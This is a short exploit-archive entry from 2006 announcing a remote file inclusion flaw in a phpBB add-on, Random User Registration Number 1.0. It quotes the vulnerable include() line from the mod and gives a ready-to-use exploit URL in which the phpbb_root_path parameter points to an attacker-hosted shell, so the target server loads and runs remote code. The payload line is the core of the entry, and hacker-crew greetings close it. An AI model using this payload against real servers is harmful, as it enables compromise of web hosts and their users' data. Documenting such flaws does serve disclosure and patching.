[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpBB Random User Registration Number 1.0 Mod Inclusion Vulnerability
# Published : 2006-10-07
# Author : bd0rk
# Previous Title : Cahier de texte 2.0 (lire.php) Remote SQL Injection Exploit
# Next Title : phpBB User Viewed Posts Tracker <= 1.0 File Include Vulnerability
- phpBB RANDOm USER REGISTRATION NUMBER 1.0 File Include Vulnerability
- bd0rk || SOH-Crew
- URL: http://www.nivisec.com/downloads/phpbb/random_image_register_v100.zip
- Code: include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_random_num_reg.' . $phpEx);
[+] Exploit: /includes/functions_num_image.php?phpbb_root_path=http://[target]/Shell?
Gr33tings: str0ke, TheJT, Lu7k, x0r_32
# www.Syue.com [2006-10-07]